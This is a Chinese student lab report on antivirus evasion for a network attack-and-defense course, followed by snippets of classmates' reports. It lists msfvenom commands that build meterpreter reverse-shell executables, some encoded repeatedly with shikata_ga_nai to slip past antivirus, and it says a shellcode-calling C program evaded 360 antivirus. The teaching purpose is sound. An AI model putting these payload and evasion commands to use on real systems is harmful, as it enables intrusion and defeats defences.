20145309《網路對抗技術》免殺原理與實踐
1.基礎問題回答
(1)殺軟是如何檢測出惡意**的?
根據特徵來檢測:對已存在的流行**特徵的提取與比對
根據行為來檢測:是否有更改登錄檔行為、是否有設定自啟動、是否有修改許可權等等
(2)免殺是做什麼?
使用一些方法使得惡意程式不被殺軟和防火牆發現,避免被查殺。
(3)免殺的基本方法有哪些?
加殼:就是相當於把你的後門**封裝起來,但是現在大部分公開的殼都能被防毒軟體查出來,所以加這些殼還不如不加;
加花指令:就是加一段垃圾**,但是並不影響程式的正常執行,加了花指令後,使一些防毒軟體無法正確識別木馬程式,從而達到免殺的效果;
再編譯:如果有源**可以使用其他語言重新編寫再編譯,或者利用已有的shellcode構造payload重新編譯生成;
修改行為:盡量少做能被防毒軟體直接檢測到的敏感行為,可以使用**式連線,或者減少對系統登錄檔之類的修改。
2.實踐總結與體會
本次實驗做得非常艱難,但是最後在反覆糾纏室友的前提下還是完成了,通過實驗我了解了防毒軟體查殺的原理,以及一般惡意**是如何偽裝的。發現即使安裝了防毒軟體以及防火牆,還是不能完全的保證電腦是安全的。
3.離實戰還缺些什麼技術或步驟?
程式設計能力的問題,以我現在的水平,只能理解惡意**的基本原理,還要借助一些惡意**的生成和編譯工具,並不能全手工做出乙個惡意**,所以很容易就會被防毒軟體檢查到。
4.實踐過程記錄
msfvenom直接生成meterpreter可執行檔案
使用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 port=5309 -f exe > test.exe命令生成meterpreter可執行檔案test.exe
使用ncat將檔案傳輸到windows主機
我們上這個**檢測一下有多少查毒軟體可以將其查殺出來
msfvenom使用編碼器生成meterpreter可執行檔案
編碼一次:
再次檢測:
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b 『\x00』 lhost=192.168.1.106 port=5309-f
再次檢測:
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b 『\x00』 lhost=192.168.1.106 port=5309 -f exe > test2.exe命令生成編碼過的可執行檔案test2.exe
再次檢測:
檢測結果如下:
使用c語言呼叫shellcode
程式一生成就被360防毒查殺了
在kali下使用msf監聽,執行剛剛編譯生成的可執行檔案,成功獲取許可權。
用360防毒查殺不出來
檢測結果如下:
20145228《網路對抗技術》免殺原理與實踐
理解免殺技術原理 正確使用msf編碼器,veil evasion,自己利用shellcode程式設計等免殺工具或技巧 1 殺軟是如何檢測出惡意 的?1 惡意 一般具有明顯的特徵碼,依據特徵碼來判斷是否是惡意 2 如果乙個程式的行為是帶有惡意的行為,也會被檢測為惡意 2 免殺是做什麼?免殺就是避免殺軟...
20145322《網路對抗技術》免殺原理與實踐
基於特徵碼的檢測 再就是根據該 是否有惡意行為來判別,若有惡意的行為,我們就認為該 是惡意 2 免殺是做什麼?通過改變惡意程式的明顯特徵等資訊已達到避免被防毒軟體查殺的技術。3 免殺的基本方法有哪些?改變特徵碼 對惡意 進行加殼,或用其他語言 如veil evasion 或編譯器進行再編譯,利用sh...
2015511《網路對抗》網路欺詐技術防範
ping通kali和靶機 因為之後用apache會用到80埠,所以先檢視80埠是否被占用,netstat tupln grep 80,如果有可以用kill 程序號殺死這兩個程序,再次檢視80埠占用情況,沒有被占用的程序 用vi開啟 etc apache2 ports.conf,檢視配置檔案中的監聽埠...